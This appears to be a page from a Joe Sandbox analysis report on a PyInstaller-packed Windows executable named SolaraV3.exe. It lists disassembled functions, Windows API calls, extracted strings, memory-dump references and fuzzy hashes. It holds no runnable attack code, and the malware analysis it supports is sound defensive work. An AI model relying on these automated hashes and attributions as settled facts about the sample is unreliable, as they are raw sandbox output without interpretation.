Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction ID: 6159a3fe0909b507218d4bb37585b52417ebddbb817d84b32bed9a8ce47fd634
Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
Instruction Fuzzy Hash: 5431E821719AC945EA218B22E4103AE6364EF84BE0F540232FE6D877C9DF3CD657CB00

Function 00007FF6DC702810 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 00007FF6DC7028EA

Strings

[PYI-%d:%ls] , xrefs: 00007FF6DC702868
ERROR, xrefs: 00007FF6DC70286F
Error, xrefs: 00007FF6DC7028DD

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: Message
String ID: ERROR$Error$[PYI-%d:%ls]
API String ID: 2030045667-255084403
Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction ID: ac48b7fb5083cbf064f8585c0f2e134070770dd78a8aba58462d55460d0510f4
Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
Instruction Fuzzy Hash: 9B21AE72B08B4586E7219B15F8957EE63A4FB88780F404136EA8D9365ADE3CE266C740

Function 00007FF6DC71C5A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FF6DC71C61F
WriteFile.KERNEL32 ref: 00007FF6DC71C8E7
WriteFile.KERNEL32 ref: 00007FF6DC71C92D
GetLastError.KERNEL32 ref: 00007FF6DC71C9E3

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction ID: 3e07541550a7beac845259cbbb19ef6864434d5710c9611dbbcc26be15ba6914
Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
Instruction Fuzzy Hash: 99D11772B18A8589EB11CFB9D4502AC3BB1FB54798B445236DE5ED7B89DE38D027C700

Function 00007FF6DC71F98C Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF6DC71FA7C
_get_daylight.LIBCMT ref: 00007FF6DC71FA8D
_get_daylight.LIBCMT ref: 00007FF6DC71FA9E
_isindst.LIBCMT ref: 00007FF6DC71FB69

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction ID: 0d8dca4ddf6bb01763834372b7d4b8cd04cdda96f7d9d93027bf4b6b5b985562
Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
Instruction Fuzzy Hash: E051F472F042198AEB24CF7C99756BC27A5AB44368F501236EE1E92AE5DF3CA5138700

Function 00007FF6DC71577C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF6DC7157AF
GetFileInformationByHandle.KERNEL32 ref: 00007FF6DC715811
GetLastError.KERNEL32 ref: 00007FF6DC7158A2
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DC7156B4), ref: 00007FF6DC7158EE

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction ID: 8ca903d05b4fe6d0601630d8177329e033a12db61ff2a03246d91cecf4230eba
Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
Instruction Fuzzy Hash: 3A51AF22E086458AFB64CF75D4603BD37B1EB48B58F14A436DE0D97689DF38D4628700

Function 00007FF6DC7020C0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF6DC7020F4
SetWindowLongPtrW.USER32 ref: 00007FF6DC702116
GetWindowLongPtrW.USER32 ref: 00007FF6DC702140
InvalidateRect.USER32 ref: 00007FF6DC702160

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: LongWindow$DialogInvalidateRect
String ID:
API String ID: 1956198572-0
Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction ID: 74362662c604f7e7c5f40a0a0847d562cf88e9f5bed9ed89757d8954ecb2912c
Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
Instruction Fuzzy Hash: 0111CC32F1C14A42F655976BE58427E52A1EF887C1F548032DF5987B9ACD3EE4E69300

Function 00007FF6DC725B1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6DC721760: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC721793

_get_daylight.LIBCMT ref: 00007FF6DC725C34
_get_daylight.LIBCMT ref: 00007FF6DC725C45

Strings

?, xrefs: 00007FF6DC725BC5

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction ID: 50d53b75fb76f07c055c764a682fe6b2492e9f35f77b94a09d3338bf0f5a05a6
Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
Instruction Fuzzy Hash: ED412B22A1828A46FBB18B25D52137DA755EB80BA8F144237EE5C87BD5DF3CD4A38700

Function 00007FF6DC719014 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC719046

Part of subcall function 00007FF6DC71A948: RtlFreeHeap.NTDLL(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A95E
Part of subcall function 00007FF6DC71A948: GetLastError.KERNEL32(?,?,?,00007FF6DC722D22,?,?,?,00007FF6DC722D5F,?,?,00000000,00007FF6DC723225,?,?,?,00007FF6DC723157), ref: 00007FF6DC71A968

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF6DC70CBA5), ref: 00007FF6DC719064

Strings

C:\Users\user\Desktop\SolaraV3.exe, xrefs: 00007FF6DC719052

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\SolaraV3.exe
API String ID: 3580290477-3821142706
Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction ID: cf413cdc6034cf69c3cfac53a21962f8c7e91602477c9449305620ca662dacc8
Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
Instruction Fuzzy Hash: 7A419332A08B0A85EB16DF29D4610BD67A4EF457E0B556037EA4E87B85DF3DE4A3C300

Function 00007FF6DC71CC38 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF6DC71CD4F
GetLastError.KERNEL32 ref: 00007FF6DC71CD71

Strings

U, xrefs: 00007FF6DC71CCFB

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction ID: 95180ee3ee2303403aed47978d376b4598dc0a8f2f4035bad47d2dd0ca4144db
Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
Instruction Fuzzy Hash: BF41C532728A5985DB208F69E4553AD6761FB88784F545132EE8DC7794EF3CD412CB40

Function 00007FF6DC71F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6DC71F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6DC71F64A

Strings

:, xrefs: 00007FF6DC71F60E

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction ID: 8cff24189984a63b990c5bd06bcecd1fed1e8df0bfbff823a69f48a4aef32553
Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
Instruction Fuzzy Hash: A4210772B0868581FB209B19D06427D73B1FB88B84F554137EA8D83694DF7CE966CB41

Function 00007FF6DC70FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6DC70FD98
RaiseException.KERNEL32 ref: 00007FF6DC70FDD9

Strings

csm, xrefs: 00007FF6DC70FDC6

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 4f0d37246fc5bd33a2aace6ee8c0f80a4060b6ed5d7b79440687495ec39ed506
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: DF112E32618B8582EB618F15E45025DB7E5FB88B84F584231EB8D47754DF3DD562C700

Function 00007FF6DC72073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72076C
GetDriveTypeW.KERNEL32 ref: 00007FF6DC7207AC

Strings

:, xrefs: 00007FF6DC720795

Memory Dump Source

Source File: 00000001.00000002.2058740986.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000001.00000002.2058669953.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058841631.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058897946.00007FF6DC742000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2058982070.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: b338db340c7240531f884c48a7cc9dc90d0fe9680b0080e81536ea76b986b95a
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: F7018F22A1820A86FB30AF64947537EA7A0EF48744F941037D68DC2795EE2CE5268B24

Analysis Process: SolaraV3.exePID: 4892, Parent PID: 2884COMMON

Execution Graph

Execution Coverage:	1.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.1%
Total number of Nodes:	710
Total number of Limit Nodes:	21

Executed Functions

Function 00007FF6DC701000 Relevance: 60.0, APIs: 6, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6DC703E02
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6DC7039DE
pkg, xrefs: 00007FF6DC7039BE
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6DC703D35
pyi-disable-windowed-traceback, xrefs: 00007FF6DC703BB2
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6DC703971
_PYI_ARCHIVE_FILE, xrefs: 00007FF6DC7038D2, 00007FF6DC7039FF
Py_GIL_DISABLED, xrefs: 00007FF6DC703AF4
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6DC703D12
pyi-python-flag, xrefs: 00007FF6DC703AD6
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6DC703A17, 00007FF6DC703A2F, 00007FF6DC703A9B
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6DC703E9E
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6DC703BE8
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6DC703882, 00007FF6DC7038AF
VCRUNTIME140.dll, xrefs: 00007FF6DC703DA9
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6DC703A0B, 00007FF6DC703CD4, 00007FF6DC703F63
Could not create temporary directory!, xrefs: 00007FF6DC703CBF
Failed to load splash screen resources!, xrefs: 00007FF6DC703E7D
Failed to start splash screen!, xrefs: 00007FF6DC703ECC
Failed to convert DLL search path!, xrefs: 00007FF6DC703DD4
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6DC703EB3
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6DC703B32
bye-runtime-tmpdir, xrefs: 00007FF6DC703B68
MEI, xrefs: 00007FF6DC703933
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6DC703C61
pyi-contents-directory, xrefs: 00007FF6DC703B8D
Failed to remove temporary directory: %s, xrefs: 00007FF6DC703FC7
_PYI_SPLASH_IPC, xrefs: 00007FF6DC703A23, 00007FF6DC703EED

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 9b17f683483ed456cfa5d3adfaaad0906d1924fbd3de9cf6bb050ba9cf488250
Instruction ID: dfc6b9dcc23d036ac38d1d12981a41f8e3d0fca2f62b258947a36f72bebd2efd
Opcode Fuzzy Hash: 9b17f683483ed456cfa5d3adfaaad0906d1924fbd3de9cf6bb050ba9cf488250
Instruction Fuzzy Hash: E632BD21A1CA8A91FA39D722D4653BD6771AF44784F844133DA5DC32C6EF2EE57AE300

Function 00007FFB0C35195B Relevance: 23.5, APIs: 5, Strings: 8, Instructions: 785COMMON

Download Yara Rule

Strings

PUT , xrefs: 00007FFB0C360DE2
POST , xrefs: 00007FFB0C360DA5
GET , xrefs: 00007FFB0C360D82
@, xrefs: 00007FFB0C3608FD
CONNE, xrefs: 00007FFB0C360DF6
..\s\ssl\record\ssl3_record.c, xrefs: 00007FFB0C3605BC, 00007FFB0C360E16, 00007FFB0C360EBE
, xrefs: 00007FFB0C3606A2
HEAD , xrefs: 00007FFB0C360DC3

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID:
String ID: $..\s\ssl\record\ssl3_record.c$@$CONNE$GET $HEAD $POST $PUT
API String ID: 0-352295518
Opcode ID: 5e87cf92e6c0c5c040c4c8738623b61db905078f7f9d67d15add37452dcc21b3
Instruction ID: d112e624c17a4925d0806c78fd23bd7083fce9e90fc9fe77280b88a8fcf2ca07
Opcode Fuzzy Hash: 5e87cf92e6c0c5c040c4c8738623b61db905078f7f9d67d15add37452dcc21b3
Instruction Fuzzy Hash: 2E728DF2A286428AFB688E25D449FBE27A0EF44B88F148135DA4D4B7D5DF7DD580C708

Function 00007FF6DC726964 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6DC726698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7266D9
Part of subcall function 00007FF6DC726698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC726757
Part of subcall function 00007FF6DC726698: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC7267A8

CreateFileW.KERNEL32 ref: 00007FF6DC726A6A
CreateFileW.KERNEL32 ref: 00007FF6DC726ABA
GetLastError.KERNEL32 ref: 00007FF6DC726AEA
GetFileType.KERNEL32 ref: 00007FF6DC726AFF
GetLastError.KERNEL32 ref: 00007FF6DC726B09
CloseHandle.KERNEL32 ref: 00007FF6DC726B3C
CloseHandle.KERNEL32 ref: 00007FF6DC726C9F
CreateFileW.KERNEL32 ref: 00007FF6DC726CD4
GetLastError.KERNEL32 ref: 00007FF6DC726CE3

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction ID: 1f658a21a2cf1cc71e7a8a535b4a0c0e3411f9669a95ad32ae96509cf338d8e8
Opcode Fuzzy Hash: baaa1bd2bfcf3e8d87424e6061cd652f961a4b3dae6ad7eaae94581ee29caa63
Instruction Fuzzy Hash: BFC1B136B28A4A85EB20CFA9C4A16AC7761F749B98F115237DE1E977D4CF38D466C300

Function 00007FFB0BB66EE0 Relevance: 11.4, APIs: 4, Strings: 2, Instructions: 893librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFB0BB679F5
GetProcAddress.KERNEL32 ref: 00007FFB0BB67A1F
